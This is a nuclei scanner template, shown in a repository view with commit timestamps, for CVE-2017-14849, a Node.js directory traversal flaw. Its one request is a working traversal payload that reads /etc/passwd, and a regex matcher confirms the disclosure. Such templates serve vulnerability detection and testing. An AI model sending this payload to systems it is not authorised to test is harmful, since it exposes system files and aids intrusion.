nuclei-templates/http/cves/2017/CVE-2017-14849.yaml

40 lines
1.1 KiB
YAML
Raw Normal View History

2021-01-02 05:02:50 +00:00
id: CVE-2017-14849
2020-08-19 15:34:31 +00:00
info:
name: Node.js <8.6.0 - Directory Traversal
2021-06-09 12:20:56 +00:00
author: Random_Robbie
2020-08-19 15:34:31 +00:00
severity: high
description: Node.js before 8.6.0 allows remote attackers to access unintended files because a change to ".." handling is incompatible with the pathname validation used by unspecified community modules.
reference:
- https://twitter.com/nodejs/status/913131152868876288
- https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/
- https://nvd.nist.gov/vuln/detail/CVE-2017-14849
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-14849
cwe-id: CWE-22
2023-07-11 19:49:27 +00:00
epss-score: 0.96872
cpe: cpe:2.3:a:nodejs:node.js:8.5.0:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: nodejs
product: node.js
tags: cve,cve2017,nodejs,lfi
2020-08-19 15:34:31 +00:00
http:
2020-08-19 15:34:31 +00:00
- method: GET
path:
- "{{BaseURL}}/static/../../../a/../../../../etc/passwd"
2023-07-11 19:49:27 +00:00
2020-08-19 15:34:31 +00:00
matchers-condition: and
matchers:
- type: regex
2023-07-11 19:49:27 +00:00
part: body
2020-08-19 15:34:31 +00:00
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200